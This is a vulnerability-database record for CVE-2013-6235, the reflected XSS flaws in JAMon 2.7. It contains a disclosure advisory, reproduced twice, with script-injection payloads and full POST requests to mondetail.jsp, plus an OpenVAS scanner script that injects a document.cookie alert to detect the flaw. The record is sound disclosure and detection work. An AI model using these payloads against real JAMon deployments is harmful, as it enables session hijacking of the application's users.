ID: CVE-2013-6235
Type: cve
Reporter: cve@mitre.org
Modified: 2018-10-09T19:34:00
Description
Multiple cross-site scripting (XSS) vulnerabilities in JAMon (Java Application Monitor) 2.7 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) listenertype or (2) currentlistener parameter to mondetail.jsp or the ArraySQL parameter to (3) mondetail.jsp, (4) jamonadmin.jsp, (5) sql.jsp, or (6) exceptions.jsp.
{"securityvulns": [{"lastseen": "2018-08-31T11:10:50", "bulletinFamily": "software", "cvelist": ["CVE-2013-6235"], "description": "\r\n###################################################\r\n01. ### Advisory Information ###\r\n\r\nTitle: Multiple Reflected XSS vulnerabilities in JAMon\r\nDate published: 2013-01-23\r\nDate of last update: 2013-01-23\r\nVendors contacted: JAMon v 2.7\r\nDiscovered by: Christian Catalano\r\nSeverity: Low\r\n\r\n02. ### Vulnerability Information ###\r\n\r\nCVE reference: CVE-2013-6235\r\nCVSS v2 Base Score: 4.3\r\nCVSS v2 Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)\r\nComponent/s: JAMon v 2.7\r\nClass: Input Manipulation\r\n\r\n03. ### Introduction ###\r\n\r\nThe Java Application Monitor (JAMon) is a free, simple, high performance, thread safe, Java API that allows developers to easily monitor production applications.\r\n\r\nhttp://jamonapi.sourceforge.net\r\n\r\n04. ### Vulnerability Description ###\r\n\r\nMultiple Non-Persistent Cross-Site Scripting vulnerabilities have been identified in the JAMon web application.\r\nJAMon contains a flaw that allows multiple reflected cross-site scripting (XSS) attacks.\r\nThis flaw exists because certain pages do not validate input before returning it to users.\r\n\r\n+------------------------------+-------------------+\r\n|-Vulnerable module(s)--------and----parameter(s)--|\r\n+------------------------------+-------------------+\r\n|mondetail.jsp --------------------ArraySQL--------|\r\n|mondetail.jsp --------------------listenertype----|\r\n|mondetail.jsp --------------------currentlistener-|\r\n|jamonadmin.jsp -------------------ArraySQL--------|\r\n|sql.jsp---------------------------ArraySQL--------|\r\n|exceptions.jsp--------------------ArraySQL--------|\r\n+------------------------------+-------------------+\r\n\r\n05. 
### Technical Description / Proof of Concept Code ###\r\n\r\n05.01) Malicious Request ("ArraySQL" parameter):\r\n\r\nThe vulnerability is located in the ' Filter (optional) ' input field upon submission to the pages\r\n\r\nhttp://localhost/jamon/mondetail.jsp\r\nhttp://localhost/jamon/ jamonadmin.jsp\r\nhttp://localhost/jamon/ sql.jsp\r\nhttp://localhost/jamon/ exceptions.jsp\r\n\r\nThe application does not validate the 'ArraySQL' parameter upon submission to the *.jsp scripts.\r\nThe attacker can inject the malicious javascript code:\r\n\r\n1-->1<ScRiPt >alert('XSS')</ScRiPt><!--\r\n\r\nin the ' Filter (optional) ' input field and click on GO! button.\r\n\r\n05.02) Malicious Request ("listenertype " parameter)\r\n\r\nPOST /jamon/mondetail.jsp HTTP/1.1\r\nHost: localhost\r\nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://localhost/jamon/mondetail.jsp\r\nCookie: JSESSIONID=3EFF8AFB46683B03B2CD73663A97FFDD.jboss1; ROUTEID=.jboss1\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 209\r\n\r\nlistenertype=1-->1<ScRiPt>alert('XSS')</ScRiPt><!--&currentlistener=JAMonBufferListener&outputTypeValue=html&formatterValue=%23%2C%23%23%23&bufferSize=No+Action&TextSize=&highlight=&ArraySQL=&actionSbmt=Go+%21\r\n\r\n\r\n05.03) Malicious Request ("currentlistener " parameter)\r\n\r\nPOST /jamon/mondetail.jsp HTTP/1.1\r\nHost: localhost\r\nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://localhost/jamon/mondetail.jsp\r\nCookie: JSESSIONID=3EFF8AFB46683B03B2CD73663A97FFDD.jboss1; ROUTEID=.jboss1\r\nConnection: 
keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 195\r\n\r\nlistenertype=value&currentlistener=1-->1<ScRiPt>alert('XSS')</ScRiPt><!--&outputTypeValue=html&formatterValue=%23%2C%23%23%23&bufferSize=No+Action&TextSize=&highlight=&ArraySQL=&actionSbmt=Go+%21\r\n\r\n06. ### Business Impact ###\r\n\r\nThis may allow an attacker to create a specially crafted request that would execute arbitrary script code in a user's browser within the trust relationship between their browser and the server.\r\n\r\n07. ### Systems Affected ###\r\n\r\nThis vulnerability was tested against: JAMon v2.7\r\nOlder versions are probably affected too, but they were not checked.\r\n\r\n08. ### Vendor Information, Solutions and Workarounds ###\r\n\r\nCurrently, there are no known upgrades or patches to correct this vulnerability.\r\n\r\n09. ### Credits ###\r\n\r\nThis vulnerability has been discovered by:\r\nChristian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com\r\n\r\n10. ### Vulnerability History ###\r\n\r\nOctober 18th, 2013: Vulnerability identification\r\nOctober 22th, 2013: Vendor notification [JAMon]\r\nDecember 10th, 2013: Vulnerability confirmation [JAMonI]\r\nJanuary 23th, 2014: Vulnerability disclosure\r\n\r\n11. 
### Disclaimer ###\r\n\r\nThe information contained within this advisory is supplied "as-is" with\r\nno warranties or guarantees of fitness of use or otherwise.\r\nI accept no responsibility for any damage caused by the use or misuse of\r\nthis information.\r\n\r\n###################################################\r\n", "edition": 1, "modified": "2014-02-03T00:00:00", "published": "2014-02-03T00:00:00", "id": "SECURITYVULNS:DOC:30281", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30281", "title": "[CVE-2013-6235] - Multiple Reflected XSS vulnerabilities in JAMon v2.7", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:09:54", "bulletinFamily": "software", "cvelist": ["CVE-2014-1612", "CVE-2014-1631", "CVE-2013-6235", "CVE-2014-1476", "CVE-2013-5350", "CVE-2014-1632", "CVE-2014-0794", "CVE-2014-1475", "CVE-2014-0793", "CVE-2014-1607"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "modified": "2014-02-03T00:00:00", "published": "2014-02-03T00:00:00", "id": "SECURITYVULNS:VULN:13548", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13548", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2020-05-08T19:05:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-6235"], "description": "This host is installed with JAMon and is prone to multiple cross site scripting\n vulnerabilities.", "modified": "2020-05-06T00:00:00", "published": "2014-02-10T00:00:00", "id": "OPENVAS:1361412562310803799", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803799", "type": "openvas", "title": "JAMon Multiple Cross-Site Scripting Vulnerabilities", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# JAMon Multiple Cross-Site Scripting Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803799\");\n script_version(\"2020-05-06T13:33:54+0000\");\n script_cve_id(\"CVE-2013-6235\");\n script_bugtraq_id(65122);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-05-06 13:33:54 +0000 (Wed, 06 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-02-10 15:38:15 +0530 (Mon, 10 Feb 2014)\");\n script_name(\"JAMon Multiple Cross-Site Scripting Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"This host is installed with JAMon and is prone to multiple cross site scripting\n vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted data via HTTP POST request and check whether it is able to read\n cookie or not.\");\n\n script_tag(name:\"insight\", value:\"Input passed via the 'ArraySQL', 
'listenertype', and 'currentlistener' POST\n parameters to mondetail.jsp and the 'ArraySQL' POST parameter to jamonadmin.jsp,\n sql.jsp, and exceptions.jsp is not properly sanitised before being returned to\n the user.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary HTML and\n script code in a user's browser session in the context of an affected site.\");\n\n script_tag(name:\"affected\", value:\"JAMon (Java Application Monitor) version 2.7 and prior\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure of this vulnerability.\nLikely none will be provided anymore.\nGeneral solution options are to upgrade to a newer release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/56570\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/124933\");\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2014/Jan/164\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\njamonPort = http_get_port(default:80);\n\nhost = http_host_name(port:jamonPort);\n\nforeach dir (make_list_unique(\"/\", \"/jamon\", \"/monitor\", http_cgi_dirs(port:jamonPort)))\n{\n\n if(dir == \"/\") dir = \"\";\n\n jamonReq = http_get(item:string(dir, \"/menu.jsp\"), port:jamonPort);\n jamonRes = 
http_keepalive_send_recv(port:jamonPort, data:jamonReq);\n\n ## Confirm the application\n if(jamonRes && ('>JAMon' >< jamonRes && \">Manage Monitor page <\" >< jamonRes ))\n {\n postdata = \"listenertype=value&currentlistener=JAMonBufferListener&\" +\n \"outputTypeValue=html&formatterValue=%23%2C%23%23%23&buf\" +\n \"ferSize=No+Action&TextSize=&highlight=&ArraySQL=1--%3E1\" +\n \"%3CScRiPt%3Ealert%28document.cookie%29%3C%2FScRiPt%3E%3\" +\n \"C%21--&actionSbmt=Go+%21\";\n\n jamonReq = string(\"POST \", dir, \"/mondetail.jsp HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n\n jamonRes = http_keepalive_send_recv(port:jamonPort, data:jamonReq);\n\n if(jamonRes =~ \"^HTTP/1\\.[01] 200\" && \"-->1<ScRiPt>alert(document.cookie)</ScRiPt><!--\" >< jamonRes &&\n \">JAMon - Monitor Detail\" >< jamonRes)\n {\n security_message(port:jamonPort);\n exit(0);\n }\n }\n}\n\nexit(99);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:51", "description": "", "published": "2014-01-24T00:00:00", "type": "packetstorm", "title": "JAMon 2.7 Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-6235"], "modified": "2014-01-24T00:00:00", "id": "PACKETSTORM:124933", "href": "https://packetstormsecurity.com/files/124933/JAMon-2.7-Cross-Site-Scripting.html", "sourceData": "`################################################### \n01. ### Advisory Information ### \n \nTitle: Multiple Reflected XSS vulnerabilities in JAMon \nDate published: 2013-01-23 \nDate of last update: 2013-01-23 \nVendors contacted: JAMon v 2.7 \nDiscovered by: Christian Catalano \nSeverity: Low \n \n02. ### Vulnerability Information ### \n \nCVE reference: CVE-2013-6235 \nCVSS v2 Base Score: 4.3 \nCVSS v2 Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \nComponent/s: JAMon v 2.7 \nClass: Input Manipulation \n \n03. 
### Introduction ### \n \nThe Java Application Monitor (JAMon) is a free, simple, high \nperformance, thread safe, Java API that allows developers to easily \nmonitor production applications. \n \nhttp://jamonapi.sourceforge.net \n \n04. ### Vulnerability Description ### \n \nMultiple Non-Persistent Cross-Site Scripting vulnerabilities have been \nidentified in the JAMon web application. \nJAMon contains a flaw that allows multiple reflected cross-site \nscripting (XSS) attacks. \nThis flaw exists because certain pages do not validate input before \nreturning it to users. \n \n+------------------------------+-------------------+ \n|-Vulnerable module(s)--------and----parameter(s)--| \n+------------------------------+-------------------+ \n|mondetail.jsp --------------------ArraySQL--------| \n|mondetail.jsp --------------------listenertype----| \n|mondetail.jsp --------------------currentlistener-| \n|jamonadmin.jsp -------------------ArraySQL--------| \n|sql.jsp---------------------------ArraySQL--------| \n|exceptions.jsp--------------------ArraySQL--------| \n+------------------------------+-------------------+ \n \n05. ### Technical Description / Proof of Concept Code ### \n \n05.01) Malicious Request (\"ArraySQL\" parameter): \n \nThe vulnerability is located in the ' Filter (optional) ' input field \nupon submission to the pages \n \nhttp://localhost/jamon/mondetail.jsp \nhttp://localhost/jamon/ jamonadmin.jsp \nhttp://localhost/jamon/ sql.jsp \nhttp://localhost/jamon/ exceptions.jsp \n \nThe application does not validate the 'ArraySQL' parameter upon \nsubmission to the *.jsp scripts. \nThe attacker can inject the malicious javascript code: \n \n1-->1<ScRiPt >alert('XSS')</ScRiPt><!-- \n \nin the ' Filter (optional) ' input field and click on GO! button. 
\n \n05.02) Malicious Request (\"listenertype \" parameter) \n \nPOST /jamon/mondetail.jsp HTTP/1.1 \nHost: localhost \nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 \nFirefox/22.0 Iceweasel/22.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: http://localhost/jamon/mondetail.jsp \nCookie: JSESSIONID=3EFF8AFB46683B03B2CD73663A97FFDD.jboss1; ROUTEID=.jboss1 \nConnection: keep-alive \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 209 \n \nlistenertype=1-->1<ScRiPt>alert('XSS')</ScRiPt><!--&currentlistener=JAMonBufferListener&outputTypeValue=html&formatterValue=%23%2C%23%23%23&bufferSize=No+Action&TextSize=&highlight=&ArraySQL=&actionSbmt=Go+%21 \n \n \n05.03) Malicious Request (\"currentlistener \" parameter) \n \nPOST /jamon/mondetail.jsp HTTP/1.1 \nHost: localhost \nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 \nFirefox/22.0 Iceweasel/22.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: http://localhost/jamon/mondetail.jsp \nCookie: JSESSIONID=3EFF8AFB46683B03B2CD73663A97FFDD.jboss1; ROUTEID=.jboss1 \nConnection: keep-alive \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 195 \n \nlistenertype=value&currentlistener=1-->1<ScRiPt>alert('XSS')</ScRiPt><!--&outputTypeValue=html&formatterValue=%23%2C%23%23%23&bufferSize=No+Action&TextSize=&highlight=&ArraySQL=&actionSbmt=Go+%21 \n \n06. ### Business Impact ### \n \nThis may allow an attacker to create a specially crafted request that \nwould execute arbitrary script code in a user's browser within the trust \nrelationship between their browser and the server. \n \n07. ### Systems Affected ### \n \nThis vulnerability was tested against: JAMon v2.7 \nOlder versions are probably affected too, but they were not checked. \n \n08. 
### Vendor Information, Solutions and Workarounds ### \n \nCurrently, there are no known upgrades or patches to correct this \nvulnerability. \n \n09. ### Credits ### \n \nThis vulnerability has been discovered by: \nChristian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com \n \n10. ### Vulnerability History ### \n \nOctober 18th, 2013: Vulnerability identification \nOctober 22th, 2013: Vendor notification [JAMon] \nDecember 10th, 2013: Vulnerability confirmation [JAMonI] \nJanuary 23th, 2014: Vulnerability disclosure \n \n11. ### Disclaimer ### \n \nThe information contained within this advisory is supplied \"as-is\" with \nno warranties or guarantees of fitness of use or otherwise. \nI accept no responsibility for any damage caused by the use or misuse of \nthis information. \n \n################################################### \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/124933/jamon-xss.txt"}]}